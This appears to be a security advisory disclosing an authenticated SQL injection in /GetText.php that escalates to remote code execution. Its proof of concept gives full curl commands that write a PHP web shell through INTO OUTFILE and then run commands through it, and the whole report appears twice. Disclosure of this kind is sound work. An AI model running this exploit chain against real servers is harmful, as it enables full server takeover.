Summary
The application is vulnerable to RCE through an authenticated SQLi.
Details
The vulnerability allows for SQL injection through the EID parameter in a GET request to /GetText.php. Authentication is required, but no elevated privileges are necessary. This allows attackers to inject SQL statements and output the result of a query with PHP code appended in an arbitrary PHP file in a writable folder served by the application.
Depending on the stack being used to host the application, the malicious file path will vary. This information can be gathered using the SQLi through LOAD_FILE statements.
PoC
To demonstrate the vulnerability, two cURL requests are needed:
- First request to create the malicious PHP file. It is necessary to know the path for the
/Images directory:
APP_IMAGES_PATH=<path_to_application_images>; curl "<url>/GetText.php?EID=1%20INTO%20OUTFILE%20%27$APP_IMAGES_PATH/RCE.php%27%20FIELDS%20TERMINATED%20BY%20%27%27%20LINES%20TERMINATED%20BY%20%27%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%20%3F%3E%27%20--%20-" -H "Cookie: <your_cookie>"
- Second request to execute arbitrary commands through the cmd parameter:
curl "<url>/Images/RCE.php?cmd=sleep+5"
Impact
This vulnerability allows remote code execution (RCE) on the server to authenticated users. Attackers can inject and execute arbitrary PHP code by appending it to query results, potentially leading to complete compromise of the application and server
apena-ba Reporter
Summary
The application is vulnerable to RCE through an authenticated SQLi.
Details
The vulnerability allows for SQL injection through the EID parameter in a GET request to /GetText.php. Authentication is required, but no elevated privileges are necessary. This allows attackers to inject SQL statements and output the result of a query with PHP code appended in an arbitrary PHP file in a writable folder served by the application.
Depending on the stack being used to host the application, the malicious file path will vary. This information can be gathered using the SQLi through LOAD_FILE statements.
PoC
To demonstrate the vulnerability, two cURL requests are needed:
/Imagesdirectory:APP_IMAGES_PATH=<path_to_application_images>; curl "<url>/GetText.php?EID=1%20INTO%20OUTFILE%20%27$APP_IMAGES_PATH/RCE.php%27%20FIELDS%20TERMINATED%20BY%20%27%27%20LINES%20TERMINATED%20BY%20%27%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%20%3F%3E%27%20--%20-" -H "Cookie: <your_cookie>"curl "<url>/Images/RCE.php?cmd=sleep+5"Impact
This vulnerability allows remote code execution (RCE) on the server to authenticated users. Attackers can inject and execute arbitrary PHP code by appending it to query results, potentially leading to complete compromise of the application and server